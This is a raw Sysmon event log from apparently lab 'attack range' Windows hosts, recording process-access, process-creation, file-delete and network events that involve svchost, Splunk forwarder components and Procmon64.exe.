10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12B3-6216-7D04-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.724{4F8D34B0-12B3-6216-7D04-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.473{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41BB8A9FA9C9EF6BBEA4FD6B72F86413,SHA256=BD2264A840A9051442B5EFA6C73346EFFEB41C65F582BD54BE3EF8CF277393F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.668{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53548-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000289741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.851{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-BA00-000000003802}4464C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5EEB096E70377C3FB1F969882B1870F,SHA256=B89CE68EF763E7172E3E86AB031F520C241D174200F54125F618CA2E9CB8174D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.627{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-BA00-000000003802}4464C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.396{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.344{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.312{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B400-000000003802}2388C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.227{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B400-000000003802}2388C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.227{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B200-000000003802}2320C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12B3-6216-7C04-000000003902}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12B3-6216-7C04-000000003902}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12B3-6216-7C04-000000003902}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.223{4F8D34B0-12B3-6216-7C04-000000003902}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 